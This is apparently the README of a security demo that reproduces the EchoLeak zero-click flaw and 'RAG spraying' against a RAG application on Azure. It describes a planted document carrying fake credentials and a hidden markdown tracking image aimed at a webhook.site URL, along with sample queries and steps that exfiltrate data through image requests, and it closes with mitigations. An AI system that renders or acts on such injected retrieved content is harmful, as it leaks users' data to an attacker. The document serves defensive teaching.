RAG EchoLeak Demo - Security Vulnerability Demonstration

⚠️ SECURITY DEMONSTRATION TOOL: This project is designed for educational purposes only. Use it only in controlled environments for security research and training, and never with real credentials or sensitive data.

Purpose

This demonstration showcases the EchoLeak vulnerability and RAG spraying attacks in Retrieval-Augmented Generation (RAG) systems. Originally discovered by Aim Security Labs as a zero-click vulnerability in Microsoft 365 Copilot, this implementation demonstrates how the same attack vectors can affect general RAG applications.

What is EchoLeak?

EchoLeak is a critical vulnerability that exploits design flaws in RAG-based AI systems, allowing attackers to:

  • Exfiltrate sensitive data through seemingly innocent queries
  • Bypass access controls via semantic similarity matching
  • Create covert data channels using hidden tracking images
  • Scale attacks automatically without user interaction

Research Background

This demo is based on the groundbreaking research by Aim Security Labs, who discovered EchoLeak as the first zero-click AI vulnerability in Microsoft 365 Copilot. Their research paper "Breaking down 'EchoLeak', the First Zero-Click AI Vulnerability Enabling Data Exfiltration from Microsoft 365 Copilot" introduced the concept of LLM Scope Violation and demonstrated how RAG systems can be weaponized against themselves.

While their research focused on Microsoft Copilot specifically, this demonstration extends the concepts to show how any RAG-based system can be vulnerable to similar attack patterns.

Architecture Overview

This solution has been restructured to properly separate concerns and avoid runtime conflicts between Azure Functions and ASP.NET Core Web Applications, providing a realistic RAG implementation for security testing.

Project Structure

rag-demo/
├── README.md                          # This file
├── README-Original.md                 # Original single-project README
├── rag-demo.sln                       # Solution file
├── RagDemo.Functions/                 # Azure Functions project
│   ├── Program.cs
│   ├── RagDemo.Functions.csproj
│   ├── IndexDocuments.cs
│   ├── QueryRag.cs
│   ├── host.json
│   ├── local.settings.json
│   ├── Models/
│   │   └── RagDocument.cs
│   ├── Services/
│   │   ├── AzureOpenAIService.cs
│   │   ├── AzureSearchService.cs
│   │   └── TextChunkingService.cs
│   └── rag-data/
│       ├── customer-incident-report.txt
│       ├── test-image-leak.txt        # 🎯 RAG spraying attack vector (InfoSec digest)
│       └── ... (other documents)
└── RagDemo.WebApp/                    # ASP.NET Core Web Application
    ├── Program.cs
    ├── RagDemo.WebApp.csproj
    ├── Pages/
    │   ├── Index.cshtml               # Updated home page
    │   ├── EchoLeakTester.cshtml      # Main EchoLeak testing interface
    │   └── EchoLeakTester.cshtml.cs   # Page model
    ├── Models/
    │   └── EchoLeakModels.cs          # UI models and DTOs
    ├── Services/
    │   └── EchoLeakApiService.cs      # Service to call Azure Functions APIs
    └── appsettings.Development.json   # Configuration

Architecture Benefits

🎯 Clean Separation

  • Azure Functions: Pure backend APIs for document processing
  • Web Application: Modern Razor Pages UI with its own models
  • Simple Communication: HTTP/JSON between the two projects

🚀 Independent Deployment

  • Each project can be deployed and scaled independently
  • No runtime conflicts between function host and web application host
  • Different configuration and hosting options
  • No shared dependencies to manage

🔧 Easy Development

  • Run Azure Functions on port 7071
  • Run Web App on port 5000/5001
  • Web app calls Functions APIs over HTTP (see the sketch below)
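
A minimal sketch of this call pattern, roughly what EchoLeakApiService.cs does; the route names (/api/IndexDocuments, /api/QueryRag) and payload shape are assumptions based on the Azure Functions file names, not verified against the demo's code:

// Sketch only: the web app talks to the Functions project over plain HTTP/JSON.
// Routes and DTO shapes are assumptions; the real service may differ.
using System.Net.Http;
using System.Net.Http.Json;
using System.Threading.Tasks;

public class EchoLeakApiService
{
    private readonly HttpClient _http;

    // The named client is registered with BaseAddress = AzureFunctions:BaseUrl
    // (http://localhost:7071 in development).
    public EchoLeakApiService(IHttpClientFactory factory)
    {
        _http = factory.CreateClient("Functions");
    }

    public Task IndexDocumentsAsync() =>
        _http.PostAsync("api/IndexDocuments", content: null);

    public async Task<string> QueryAsync(string query)
    {
        var response = await _http.PostAsJsonAsync("api/QueryRag", new { query });
        return await response.Content.ReadAsStringAsync();
    }
}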

How to Run

1. Start Azure Functions (Terminal 1)

cd RagDemo.Functions
func start

This will start the functions on http://localhost:7071

2. Start Web Application (Terminal 2)

cd RagDemo.WebApp
dotnet run

This will start the web app on https://localhost:5001

3. Use the EchoLeak Tester

  1. Navigate to https://localhost:5001
  2. Click on "⚠️ EchoLeak Tester" in the navigation
  3. Click "Index Documents First" to index all documents
  4. Enter queries to test the vulnerability
  5. Monitor browser network tab for external image requests

Configuration

Note: This demo now supports Managed Identity for both Azure Cognitive Search and Azure OpenAI. When using managed identity, API keys are not required. Ensure proper RBAC roles are assigned:

  • Azure Search: Search Index Data Contributor (sufficient for data plane operations like indexing and searching)
  • Azure OpenAI: Cognitive Services OpenAI User and Cognitive Services User

Make sure the Azure Search service authentication mode allows RBAC ("RBAC" or "Both" - not "API Key Only").

Azure Functions (RagDemo.Functions/local.settings.json)

{
    "Values": {
        "AzureOpenAI:Endpoint": "https://your-openai.openai.azure.com/",
        "AzureOpenAI:EmbeddingModel": "text-embedding-ada-002",
        "AzureSearch:Endpoint": "https://your-search.search.windows.net",
        "AzureSearch:IndexName": "your-index-name"
    }
}

Web Application (RagDemo.WebApp/appsettings.Development.json)

{
    "AzureFunctions": {
        "BaseUrl": "http://localhost:7071"
    },
    "AzureSearch": {
        "Endpoint": "https://your-search.search.windows.net",
        "IndexName": "your-index-name"
    }
}
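
The settings above contain no API keys; authentication relies on managed identity (or your az login credentials locally). The following is a minimal sketch of how the Functions project might construct its Azure clients from these settings, assuming the .NET isolated worker model and the Azure.Identity, Azure.Search.Documents, and Azure.AI.OpenAI (2.x) packages; the demo's actual Program.cs and service classes may differ:

// Sketch only: DefaultAzureCredential uses az login locally and the
// Function App's managed identity when deployed to Azure.
using System;
using Azure.Identity;
using Azure.Search.Documents;
using Azure.AI.OpenAI;
using Microsoft.Extensions.DependencyInjection;
using Microsoft.Extensions.Hosting;

var host = new HostBuilder()
    .ConfigureFunctionsWorkerDefaults()
    .ConfigureServices((context, services) =>
    {
        var config = context.Configuration;
        var credential = new DefaultAzureCredential();

        // Search client for indexing and querying the RAG index
        services.AddSingleton(new SearchClient(
            new Uri(config["AzureSearch:Endpoint"]!),
            config["AzureSearch:IndexName"],
            credential));

        // OpenAI client for generating embeddings
        services.AddSingleton(new AzureOpenAIClient(
            new Uri(config["AzureOpenAI:Endpoint"]!),
            credential));
    })
    .Build();

host.Run();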

🎬 Step-by-Step Demo Walkthrough

Phase 1: Setup the Attack Surface

  1. Start the applications (see "How to Run" section above)
  2. Open monitoring tab: Visit https://webhook.site/#!/078636ce-a013-458c-9c85-0b5b91e5227a
  3. Navigate to EchoLeak Tester: https://localhost:5001 → "⚠️ EchoLeak Tester"
  4. Index documents: Click "Index Documents First" to load the InfoSec digest
  5. Open browser DevTools: Open Network tab

Phase 2: Execute RAG Spraying Attack

Try these realistic queries and observe the immediate external tracking:

  1. Query: "GitHub token reset"

    • Expected Result: InfoSec digest appears with live token ghp_ragSprayDemoToken987654321
    • External Call: Watch webhook.site receive immediate HTTP request
  2. Query: "AWS staging credentials"

    • Expected Result: Document shows AKIA_SPRAY_9988 and secret key
    • External Call: Hidden image loads, sending access notification
  3. Query: "VPN password help"

    • Expected Result: Contractor credentials WelcomeVPN2024! exposed
    • External Call: Real-time tracking in webhook.site logs

Phase 3: Analyze the Attack Impact

  1. Check webhook.site logs: See real-time access events for each query
  2. Review Network tab: Notice external requests to webhook.site
  3. Examine exposed data: GitHub tokens, AWS keys, passwords, internal URLs
  4. Consider scale: Imagine this across thousands of documents and users

💡 Key Demonstration Points

  • Zero suspicious activity: All queries appear legitimate and work-related
  • Broad attack surface: Many innocent queries can trigger sensitive document access
  • Immediate exfiltration: Real-time tracking via hidden images
  • Rich credential harvest: Multiple types of sensitive data in one document
  • Realistic scenario: InfoSec digests are common in enterprise environments

EchoLeak Testing Features

πŸ•·οΈ Web-Based Interface

  • Modern Bootstrap UI with responsive design
  • Real-time feedback and status updates
  • Example dangerous queries for testing

πŸ–ΌοΈ Image Rendering Vulnerability

  • Markdown rendering with external image loading
  • Tests webhook.site integration for tracking
  • Demonstrates data exfiltration through image requests (see the sketch below)
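
The vulnerability here is simply rendering retrieved content as markdown without stripping external resources. A minimal sketch of that pattern, assuming a Markdig-style converter (the demo's actual rendering code may differ):

// Sketch only: any ![](https://attacker.example/...) image inside an indexed
// document becomes an <img> tag, and the browser fires the external request
// the moment the result is displayed. Markdig is an assumption, not
// necessarily the library the demo uses.
using Markdig;

public static class ResultRenderer
{
    public static string Render(string retrievedChunk)
    {
        // Vulnerable: external images, links, and raw HTML pass straight through.
        return Markdown.ToHtml(retrievedChunk);
    }
}

A hardened renderer would sanitize the resulting HTML or drop external image URLs entirely; see the Mitigation Strategies section below.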

πŸ” Sensitive Content Detection

  • Automatic pattern matching for sensitive information
  • Visual indicators for dangerous results
  • Raw content vs. rendered markdown comparison

Testing the Vulnerability

RAG Spraying Technique

This demo showcases RAG spraying - where innocent, everyday queries can retrieve sensitive documents through semantic similarity. The test document (test-image-leak.txt) contains a realistic InfoSec weekly digest that would naturally match common security and development queries.

🎯 Featured Attack Document: test-image-leak.txt

This document simulates a Weekly Security Digest that contains:

  • GitHub Personal Access Tokens: ghp_ragSprayDemoToken987654321
  • AWS Staging Credentials: Access keys and secrets for temporary environments
  • VPN Credentials: Contractor onboarding passwords (WelcomeVPN2024!)
  • Internal Service URLs: Slack admin, GitLab runners, Jenkins console
  • Hidden Tracking Image: ![](https://webhook.site/078636ce-a013-458c-9c85-0b5b91e5227a/rag-spraying-digest)

Realistic Test Queries (RAG Spraying)

These innocent queries demonstrate how users asking for legitimate help can inadvertently access the InfoSec digest:

Security-Related Queries:

  • "how do I reset my GitHub token"
  • "AWS access key setup"
  • "VPN connection instructions"
  • "security team contact information"
  • "weekly security updates"

Developer Workflow Queries:

  • "GitLab runner configuration"
  • "Jenkins console access"
  • "Slack admin panel"
  • "contractor onboarding process"
  • "infosec email contact"

Infrastructure Queries:

  • "internal tools access"
  • "credential rotation process"
  • "temporary AWS staging"
  • "MFA reset procedure"

The RAG Spraying Attack Vector

  1. Innocent Query: Developer searches for "how to reset GitHub token"
  2. Semantic Match: RAG system finds the "Weekly Security Digest" document
  3. Sensitive Exposure: Document contains live tokens, AWS keys, VPN passwords, internal URLs
  4. External Tracking: Hidden image triggers request to webhook.site/078636ce-a013-458c-9c85-0b5b91e5227a
  5. Data Exfiltration: Attacker's webhook receives sensitive content via image parameters

What to Monitor

  1. Browser Network Tab: Look for requests to webhook.site/078636ce-a013-458c-9c85-0b5b91e5227a
  2. Search Results: Check if the InfoSec digest is returned for innocent queries
  3. Rendered Markdown: See if the hidden tracking image loads from external site
  4. Content Highlighting: Sensitive credentials and tokens are visible in results
  5. Webhook Logs: Visit https://webhook.site/#!/078636ce-a013-458c-9c85-0b5b91e5227a to see access logs

πŸ•΅οΈ Live Attack Monitoring

The embedded tracking image URL (webhook.site/078636ce-a013-458c-9c85-0b5b91e5227a/rag-spraying-digest) allows real-time monitoring of:

  • When: Timestamp of document access
  • Who: IP address and user agent of the accessing client
  • What: Query parameters can be modified to exfiltrate specific data
  • How Often: Frequency of access to sensitive documents

To monitor live attacks:

  1. Open https://webhook.site/#!/078636ce-a013-458c-9c85-0b5b91e5227a in a separate tab
  2. Run queries in the EchoLeak Tester
  3. Watch real-time HTTP requests appear when sensitive documents are accessed
  4. Notice how innocent queries trigger immediate external network calls

Security Implications

🚨 Vulnerability Patterns Showcased

The test-image-leak.txt document demonstrates several critical security anti-patterns:

  1. Credential Storage in Documents

    • GitHub Personal Access Tokens in plaintext
    • AWS credentials with clear access/secret key pairs
    • VPN passwords in communication channels
  2. Internal Infrastructure Exposure

    • Direct URLs to admin panels (admin.slack.corp/tools)
    • Internal service endpoints (jenkins.infra.local:8080)
    • Configuration paths (gitlab.internal/config/runner)
  3. Covert Tracking Mechanisms

    • Hidden image with unique webhook identifier
    • External domain for real-time access monitoring
    • URL parameters that could exfiltrate query context
  4. Social Engineering Vectors

    • Appears as legitimate InfoSec communication
    • Contains helpful context that users would naturally search for
    • Warning text that's ignored by RAG systems

🎯 RAG Spraying Attack Impact

This demo shows how RAG systems can be exploited through RAG spraying attacks:

  • ❌ Innocent queries expose sensitive documents through semantic similarity
  • ❌ Queries appear legitimate, so no suspicious activity is detected
  • ❌ Data leaks through external image rendering when markdown is processed
  • ❌ Access controls that would normally protect sensitive documents are bypassed
  • ❌ Embedded tracking images create covert data exfiltration channels
  • ❌ Attacks scale to automate discovery of sensitive content across large document stores

Mitigation Strategies

To prevent RAG spraying and EchoLeak attacks:

  1. Document Classification & Segregation:

    • Separate public and sensitive content into different indexes
    • Implement document sensitivity scoring and access tiers
  2. Semantic Access Controls:

    • Apply user-based filtering before semantic search
    • Implement role-based document access at the embedding level
  3. Content Sanitization (see the sketch after this list):

    • Scan for sensitive patterns (credentials, PII, etc.) before indexing
    • Strip or mask sensitive data in search results
  4. Query Analysis & Monitoring:

    • Monitor for patterns indicative of RAG spraying attacks
    • Implement rate limiting and anomaly detection
  5. Secure Rendering Controls (see the CSP snippet after this list):

    • Sanitize markdown and disable external resources
    • Use Content Security Policy (CSP) to prevent external requests
  6. Audit & Governance:

    • Log all queries and results for security analysis
    • Regular review of indexed content for sensitivity
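
As a concrete illustration of point 3, a pre-indexing scan can mask obvious credential patterns before a chunk is ever embedded. This is a minimal sketch with illustrative regexes only; it is not the demo's code, and real systems should use a dedicated secret-scanning library and a proper classification pipeline:

// Sketch only: masks common credential patterns before a chunk is indexed.
// The patterns are illustrative (they happen to match the demo's fake
// ghp_... and AKIA_... secrets) and are far from exhaustive.
using System.Text.RegularExpressions;

public static class IndexingSanitizer
{
    private static readonly Regex[] SensitivePatterns =
    {
        new Regex(@"ghp_[A-Za-z0-9]{20,}"),          // GitHub personal access tokens
        new Regex(@"AKIA[0-9A-Z_]{8,}"),             // AWS access key IDs
        new Regex(@"(?i)password\s*[:=]\s*\S+"),     // inline passwords
        new Regex(@"!\[[^\]]*\]\(https?://[^)]+\)"), // markdown images pointing at external hosts
    };

    public static string Sanitize(string chunk)
    {
        foreach (var pattern in SensitivePatterns)
            chunk = pattern.Replace(chunk, "[REDACTED]");
        return chunk;
    }
}

For point 5, a Content Security Policy header on the web app blocks the hidden tracking image even when a sensitive document slips through retrieval. A minimal ASP.NET Core middleware sketch, offered as an assumption about how one could harden the UI (the demo does not ship this):

// Sketch only: in RagDemo.WebApp/Program.cs, after `var app = builder.Build();`.
// Restricting images to the app's own origin means external tracking pixels
// such as webhook.site never load.
app.Use(async (context, next) =>
{
    context.Response.Headers["Content-Security-Policy"] = "img-src 'self'";
    await next();
});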

Deployment with Managed Identity

Azure RBAC Setup for Production

When deploying to Azure, assign the following roles to your Function App's managed identity:

Azure Cognitive Search:

# Replace with your values
RESOURCE_GROUP="your-resource-group"
SEARCH_SERVICE="your-search-service"
FUNCTION_APP="your-function-app"

# Get the Function App's managed identity principal ID
PRINCIPAL_ID=$(az functionapp identity show \
  --resource-group $RESOURCE_GROUP \
  --name $FUNCTION_APP \
  --query principalId -o tsv)

# Assign Search roles (data plane access only)
az role assignment create \
  --assignee $PRINCIPAL_ID \
  --role "Search Index Data Contributor" \
  --scope "/subscriptions/$(az account show --query id -o tsv)/resourceGroups/$RESOURCE_GROUP/providers/Microsoft.Search/searchServices/$SEARCH_SERVICE"

Azure OpenAI:

# Replace with your values
OPENAI_SERVICE="your-openai-service"

# Assign OpenAI roles
az role assignment create \
  --assignee $PRINCIPAL_ID \
  --role "Cognitive Services OpenAI User" \
  --scope "/subscriptions/$(az account show --query id -o tsv)/resourceGroups/$RESOURCE_GROUP/providers/Microsoft.CognitiveServices/accounts/$OPENAI_SERVICE"

az role assignment create \
  --assignee $PRINCIPAL_ID \
  --role "Cognitive Services User" \
  --scope "/subscriptions/$(az account show --query id -o tsv)/resourceGroups/$RESOURCE_GROUP/providers/Microsoft.CognitiveServices/accounts/$OPENAI_SERVICE"

🔒 Principle of Least Privilege

This demo follows the principle of least privilege by assigning only the minimal roles required:

Azure Search Roles:

  • ✅ Search Index Data Contributor: Grants read/write access to documents and indexes (data plane)
    • Required for: indexing documents, searching documents

Azure OpenAI Roles:

  • ✅ Cognitive Services OpenAI User: Grants access to OpenAI endpoints
  • ✅ Cognitive Services User: Grants general Cognitive Services access (required in addition to OpenAI User)

Role Assignment Verification:

# Verify role assignments
az role assignment list --assignee $PRINCIPAL_ID --output table

Important Configuration Notes

  1. Azure Search Authentication Mode: Ensure your Azure Cognitive Search service is configured to allow "API Key and RBAC" or "RBAC Only" authentication. The default "API Key Only" mode will reject managed identity tokens.

  2. Local Development: Use az login to authenticate locally. The DefaultAzureCredential will automatically use your Azure CLI credentials for development.

Development Notes

  • Web app uses IHttpClientFactory for better connection management
  • Error handling and logging throughout the application
  • Shared models prevent code duplication
  • Configuration is environment-specific and secure

Acknowledgments

This demonstration is inspired by and builds upon the foundational research from Aim Security Labs on the EchoLeak vulnerability. Their pioneering work in identifying LLM Scope Violations and demonstrating zero-click AI vulnerabilities in Microsoft 365 Copilot has been instrumental in advancing our understanding of AI security risks. For the complete technical details and original research, see their paper: "Breaking down 'EchoLeak', the First Zero-Click AI Vulnerability Enabling Data Exfiltration from Microsoft 365 Copilot".

